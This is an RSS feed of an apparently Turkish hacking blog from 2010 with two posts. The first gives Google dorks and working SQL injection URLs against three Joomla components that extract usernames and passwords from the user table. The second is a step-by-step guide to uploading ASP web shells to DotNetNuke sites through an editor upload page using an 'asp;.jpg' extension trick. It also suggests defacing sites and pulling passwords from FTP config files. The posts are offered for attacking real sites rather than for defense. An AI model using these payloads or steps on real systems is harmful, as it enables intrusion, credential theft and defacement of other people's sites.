<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Bugstrag&#039;s Blog  sql, Lfi,rfi,xss ,csrf </title>
	<atom:link href="http://bugstrag.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://bugstrag.wordpress.com</link>
	<description>Just another WordPress.com weblog</description>
	<lastBuildDate>Sun, 25 Apr 2010 19:33:29 +0000</lastBuildDate>
	<language>tr</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='bugstrag.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Bugstrag&#039;s Blog  sql, Lfi,rfi,xss ,csrf </title>
		<link>http://bugstrag.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://bugstrag.wordpress.com/osd.xml" title="Bugstrag&#039;s Blog  sql, Lfi,rfi,xss ,csrf " />
	<atom:link rel='hub' href='http://bugstrag.wordpress.com/?pushpress=hub'/>
		<item>
		<title>Güncel Joomla SQL Açıkları</title>
		<link>http://bugstrag.wordpress.com/2010/04/23/guncel-joomla-sql-aciklari/</link>
		<comments>http://bugstrag.wordpress.com/2010/04/23/guncel-joomla-sql-aciklari/#comments</comments>
		<pubDate>Fri, 23 Apr 2010 10:52:36 +0000</pubDate>
		<dc:creator>bugstrag</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://bugstrag.wordpress.com/?p=5</guid>
		<description><![CDATA[hack ,hacker ,sql , sql hacking<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bugstrag.wordpress.com&amp;blog=13284858&amp;post=5&amp;subd=bugstrag&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;">Google Arama kodu : allinurl: &#8220;com_jokes&#8221;</p>
<p>EXPLOIT :</p>
<p>Kod:<br />
index.php?option=com_jokes&amp;Itemid=S@BUN&amp;func=CatVi   ew&amp;cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
Joomla SQL Injection(com_recipes)</p>
<p>AUTHOR : S@BUN</p>
<p>Google Arama Kodu : allinurl: &#8220;com_recipes&#8221;</p>
<p>EXPLOIT :</p>
<p>Kod:<br />
index.php?option=com_recipes&amp;Itemid=S@BUN&amp;func=det   ail&amp;id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5   ,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username   ,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;Joomla  SQL Injection(com_estateagent)</p>
<p>Açığı Bulan:S@bun</p>
<p>Google Arama Kodu:allinurl: allinurl: &#8220;com_estateagent&#8221;<br />
EXPLOIT :</p>
<p>Kod:<br />
index.php?option=com_estateagent&amp;Itemid=S@BUN&amp;func   =showObject&amp;info=contact&amp;objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&amp;results=S@BUN</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bugstrag.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bugstrag.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bugstrag.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bugstrag.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bugstrag.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bugstrag.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bugstrag.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bugstrag.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bugstrag.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bugstrag.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bugstrag.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bugstrag.wordpress.com/5/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bugstrag.wordpress.com/5/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bugstrag.wordpress.com/5/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bugstrag.wordpress.com&amp;blog=13284858&amp;post=5&amp;subd=bugstrag&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bugstrag.wordpress.com/2010/04/23/guncel-joomla-sql-aciklari/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6669af1b61ee7a014c36e95f3717126e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bugstrag</media:title>
		</media:content>
	</item>
		<item>
		<title>Dotnuke Asp FSO upload</title>
		<link>http://bugstrag.wordpress.com/2010/04/23/hello-world/</link>
		<comments>http://bugstrag.wordpress.com/2010/04/23/hello-world/#comments</comments>
		<pubDate>Fri, 23 Apr 2010 10:13:00 +0000</pubDate>
		<dc:creator>bugstrag</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[Dotnuke Asp FSO (File Sistem Obje) upload dork: &#8220;portals/0/&#8221; sitelerin sonuna aşağdaki bölümü ekliyoruz. /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx File ( A File On Your Site ) işaretliyoruz adres cubuğuna jsp kodunu yapıştırıp enterliyoruz javascript:__doPostBack(&#8216;ctlURL$cmdUpload&#8217;,&#8221;) Gözat ekrana geldi gözattan aşağıdaki linkte verdiğim zehir.asp veya diğer fso scriptlerden birininin uzantısını asp;.jpg şeklinde değiştirup upload ediyoruz. Büyük çoğunluğunda çalışıyor. şu çalışmadı [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bugstrag.wordpress.com&amp;blog=13284858&amp;post=1&amp;subd=bugstrag&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p style="text-align:center;"><strong>Dotnuke Asp FSO (File Sistem Obje) upload</strong></p>
<p><strong>dork: &#8220;portals/0/&#8221;</strong></p>
<p><strong>sitelerin  sonuna aşağdaki bölümü ekliyoruz.<br />
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</strong></p>
<p><strong>File  ( A File On Your Site )</strong></p>
<p><strong>işaretliyoruz</strong></p>
<p><strong>adres cubuğuna jsp  kodunu yapıştırıp enterliyoruz</strong></p>
<p><strong>javascript:__doPostBack(&#8216;ctlURL$cmdUpload&#8217;,&#8221;)</strong></p>
<p><strong>Gözat  ekrana geldi</strong></p>
<p><strong>gözattan aşağıdaki linkte verdiğim zehir.asp veya  diğer fso scriptlerden birininin uzantısını</strong></p>
<p><strong>asp;.jpg şeklinde  değiştirup upload ediyoruz.<br />
Büyük çoğunluğunda çalışıyor. şu  çalışmadı bu çalışmadı diye yazmayın. çalışmıyorsa serverde kurulu  antivirüsler scripti yutmuştur, veya sadece kodlar görünür asp  çalışmayabilir.<br />
serverde permission yoksa tümünü deface etmek  mümkündür. permission varsa permissionları<br />
aşmak oldukça güçtür.  C:\program files te ws_ftp ini servu.ini gibi dosyalarda şifreler  olabilir<br />
plesk se herhangi bir önlem alınmadıysa mysql backup tan  nadirde olsa bir takım veriler alınabilir</strong></p>
<p><strong><br />
</strong></p>
<p><strong>uzakdoğu bilhassa çin  siteleri için nhd.asp yi kullanın diğerleri çalışmazsa nhd.asp çalışır.</strong></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bugstrag.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bugstrag.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bugstrag.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bugstrag.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bugstrag.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bugstrag.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bugstrag.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bugstrag.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bugstrag.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bugstrag.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bugstrag.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bugstrag.wordpress.com/1/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bugstrag.wordpress.com/1/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bugstrag.wordpress.com/1/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bugstrag.wordpress.com&amp;blog=13284858&amp;post=1&amp;subd=bugstrag&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bugstrag.wordpress.com/2010/04/23/hello-world/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/6669af1b61ee7a014c36e95f3717126e?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">bugstrag</media:title>
		</media:content>
	</item>
	</channel>
</rss>
